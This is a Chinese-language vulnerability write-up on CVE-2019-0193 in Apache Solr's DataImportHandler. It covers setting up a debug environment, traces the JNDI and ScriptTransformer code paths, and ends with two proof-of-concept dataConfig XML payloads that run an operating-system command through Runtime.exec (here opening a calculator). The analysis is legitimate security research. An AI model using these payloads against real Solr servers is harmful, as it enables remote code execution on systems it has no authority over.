调试环境搭建
- 1.JDK 8U20
- 2.下载solr 8.1.0(8.2.0需要开启
enable.dih.dataConfigParam
)
https://archive.apache.org/dist/lucene/solr/8.1.0/solr-8.1.0.zip - 3.下载java数据库驱动jar,这里以mysql举例
https://cdn.mysql.com//Downloads/Connector-J/mysql-connector-java-8.0.17.zip
解压以后可以获得mysql-connector-java-8.0.17.jar
- 4.放置
mysql-connector-java-8.0.17.jar
到solr-8.1.0/server/solr-webapp/webapp/WEB-INF/lib/
下 - 5.安装apache-ant
- 6.进入solr根目录运行
ant idea
,即可将solr源码编译成intellij idea项目。在编译idea项目时时候可能会失败,此时可以运行ant ivy-bootstrap
- 7.使用idea open编译好的文件夹,等待一段时间
- 8.新增Remote,作如下配置
data:image/s3,"s3://crabby-images/115a4/115a4c15c851a18aa389857ac6a0f74e335abe88" alt=""
如果没有server模块,请到solr根目录下运行ant server
- 9.在如下位置新增xml内容
data:image/s3,"s3://crabby-images/2ed3e/2ed3ed6e341b9ece0bc6e2977954f7a974d82ec9" alt=""
<requestHandler name="/dataimport" class="solr.DataImportHandler">
<lst name="defaults">
<str name="config">db-data-config.xml</str>
</lst>
</requestHandler>
db-data-config.xml
<dataConfig>
<dataSource driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:${solr.install.dir}/example/example-DIH/hsqldb/ex" user="sa" />
<document>
<entity name="item" query="select * from item"
deltaQuery="select id from item where last_modified > '${dataimporter.last_index_time}'">
<field column="NAME" name="name" />
<entity name="feature"
query="select DESCRIPTION from FEATURE where ITEM_ID='${item.ID}'"
deltaQuery="select ITEM_ID from FEATURE where last_modified > '${dataimporter.last_index_time}'"
parentDeltaQuery="select ID from item where ID=${feature.ITEM_ID}">
<field name="features" column="DESCRIPTION" />
</entity>
<entity name="item_category"
query="select CATEGORY_ID from item_category where ITEM_ID='${item.ID}'"
deltaQuery="select ITEM_ID, CATEGORY_ID from item_category where last_modified > '${dataimporter.last_index_time}'"
parentDeltaQuery="select ID from item where ID=${item_category.ITEM_ID}">
<entity name="category"
query="select DESCRIPTION from category where ID = '${item_category.CATEGORY_ID}'"
deltaQuery="select ID from category where last_modified > '${dataimporter.last_index_time}'"
parentDeltaQuery="select ITEM_ID, CATEGORY_ID from item_category where CATEGORY_ID=${category.ID}">
<field column="DESCRIPTION" name="cat" />
</entity>
</entity>
</entity>
</document>
</dataConfig>
- 10.进入
solr/solr/bin
,执行如下命令启动solr远程debug模式
./solr start -p 8988 -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8988"
等待terminal出现Listening for transport dt_socket at address: 8988
提示语时,点击idea的debug按钮
data:image/s3,"s3://crabby-images/95c13/95c130cc0c9dd6ba83abc59c1c15fb8da51e9871" alt=""
点击以后,debugger启动,同时solr启动正常
data:image/s3,"s3://crabby-images/e262f/e262f1251dc57647cef04140f9c80ac6c194fca3" alt=""
data:image/s3,"s3://crabby-images/993bc/993bc04ebb0992780de8928b44deb6f0644274ee" alt=""
- 11.访问
http://127.0.0.1:8988/solr/
即可
漏洞分析
1.JNDI触发
根据官方或者网络上的Solr DIH指南,不难得出DIH的基本xml配置如下
<dataConfig>
<dataSource name= "mysql" type="JdbcDataSource" driver="com.mysql.jdbc.Driver" url="jdbc:mysql://127.0.0.1:3306/mysql" user="root" password="root"/>
<document>
<entity name= "node">
</entity>
</document>
</dataConfig>
得到JdbcDataSource
关键字,尝试搜索相关类,最终在org.apache.solr.handler.dataimport
包内找到JdbcDataSource类
data:image/s3,"s3://crabby-images/f0c7b/f0c7ba388a7fae13d5d0cbd2d8b9b7053071b133" alt=""
翻看此类发现jndiName
属性,猜测该类可能有JNDI注入的可能性。在JdbcDataSource类中搜索jndiName
,找到if (jndiName != null)
相关代码片段。尝试在此处打入断点,且尝试构造xml写入配置进行debug。
data:image/s3,"s3://crabby-images/202b5/202b5be0d186702ce4a05c365e531b5f7ce5b76c" alt=""
跟踪该断点,直接跳转到getFromJndi
方法,随之进入InitialContext
类的对象方法lookup
data:image/s3,"s3://crabby-images/9b49d/9b49dfbd4227623bde7b49b8fc7106f0eda0e799" alt=""
执行lookup()
,可以进行JNDI注入,最终触发org.apache.solr.core.SolrCore
的execute
完成RCE
data:image/s3,"s3://crabby-images/afc82/afc82daabdc153bb175bd35c2f7b5e28ee526344" alt=""
data:image/s3,"s3://crabby-images/235cd/235cdfa3368b15b0fe584b00c9a306f261c53cdf" alt=""
2.ScriptTransformer触发
根据NVD的漏洞预警和qita的指南,可以得知此次的漏洞是可以通过ScriptTransformer配合script触发的。
data:image/s3,"s3://crabby-images/fc63f/fc63f4783eedcf528413346194118b55e21cce89" alt=""
data:image/s3,"s3://crabby-images/14956/1495640049bd19452b7e508a679a3f69a10d7bb1" alt=""
配置DataSource有多种方式,这里以JdbcDataSource为例
data:image/s3,"s3://crabby-images/1bbf9/1bbf9626c1d5448b0bbc1369599694f4847dfd09" alt=""
在org.apache.solr.handler.dataimport.DataImportHandler
的handleRequestBody
打上断点插入数据进行debug
发现,他会进入下面的判断体
data:image/s3,"s3://crabby-images/d1a95/d1a95728426ee300bce90444df64f8f02a56ee12" alt=""
这里我们的请求的command为full-import
data:image/s3,"s3://crabby-images/6e9fa/6e9fa750cc6cce116b429f46a0fe7b94a5aeb7d9" alt=""
随即进入maybeReloadConfiguration
,由于dataconfig不为空,使用loadDataConfig
加载
data:image/s3,"s3://crabby-images/96b1d/96b1d536fdf4d077e87fb461e88f01ec99c4f0f8" alt=""
随后使用readFromXml
加载配置文件中提交的数据,使用getText
获得function
data:image/s3,"s3://crabby-images/fc1a4/fc1a483b56af5efa735531a5c5cb35ec8e55d3c1" alt=""
最后获取到所有数据以后,返回一个DIHConfiguration
对象,当debug为ture执行runCmd方法
data:image/s3,"s3://crabby-images/35fde/35fde13f96c6a7c3cc167c8e8eab39ae91006156" alt=""
在判断command为full-import时,执行 this.doFullImport(sw, reqParams);
data:image/s3,"s3://crabby-images/700af/700afbc6fd589f0c5f22009bb6f3485c89ec08dd" alt=""
在doFullImport
中存在this.docBuilder.execute();
,将得到一个EntityProcessorWrapper
对象——epw
epw中的nextRow
中存在applyTransformer()
转换脚本,而其使用的是相应Transformer的transformRow
data:image/s3,"s3://crabby-images/560d8/560d881f3c7fc6e408927cba5b92994bb3f28b09" alt=""
根据官方文档,ScriptTransformer允许多种Java支持的脚本语言调用,如Javascript、JRuby、Jython、Groovy和BeanShell等
data:image/s3,"s3://crabby-images/89d9a/89d9a8b440fb26b475bee10d5d1f317d3be55476" alt=""
而在solr中,JS的默认引擎是Nashorn
data:image/s3,"s3://crabby-images/53951/53951c2507dd6904deec9d7a0070ef4d49ae8a9d" alt=""
使用scriptEngine.eval(scriptText);
取出具体脚本语言和我们要执行的代码
data:image/s3,"s3://crabby-images/5c88e/5c88e857bfb88163380ef941ae21d026030cec4d" alt=""
最后调用return this.engine == null ? row : this.engine.invokeFunction(this.functionName, row, context);
data:image/s3,"s3://crabby-images/3b55c/3b55c094c9e2c732b891dfdf97b25fe26be608bb" alt=""
发现这里调用的invokeFunction其实是javax.script.Invocable
的invokeFunction
data:image/s3,"s3://crabby-images/992ef/992ef6a0398b779fe32dec444de14566ae13d1bd" alt=""
最终RCE触发成功
data:image/s3,"s3://crabby-images/f7188/f7188cc736063b982b24a3bfce729f1cc7aa03b4" alt=""
调用栈如下:
data:image/s3,"s3://crabby-images/5dff4/5dff4304720205cddf99db7b5f25d2ea2111ccd0" alt=""
POC
JdbcDataSource poc
<dataConfig>
<dataSource name= "mysql" type="JdbcDataSource" driver="com.mysql.jdbc.Driver" url="jdbc:mysql://127.0.0.1:3306/mysql" user="root" password="root"/>
<script ><![CDATA[java.lang.Runtime.getRuntime().exec("open -a Calculator");]]>
</script>
<document>
<entity name= "poc" query= "SELECT 1" transformer= "script:"/>
</document>
</dataConfig>
URLDataSource poc
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[ java.lang.Runtime.getRuntime().exec("open -a Calculator");
]]></script>
<document>
<entity name="poc"
url="https://stackoverflow.com/feeds"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:" />
</document>
</dataConfig>
JNDI 触发poc可通过自行debug得出
鸣谢
pyn3rd
参考
用Intellij idea搭建solr调试环境:
https://www.cnblogs.com/jeniss/p/5995921.html
SolrでDataImportHandlerのTransformerをJavaScriptで書く:
https://qiita.com/nanakenashi/items/fc613d5b9deec5d2bed7
nvd CVE-2019-0193:
https://nvd.nist.gov/vuln/detail/CVE-2019-0193
Solr Ref Guide 8.1:
https://lucene.apache.org/solr/guide/8_1/uploading-structured-data-store-data-with-the-data-import-handler.html
网友评论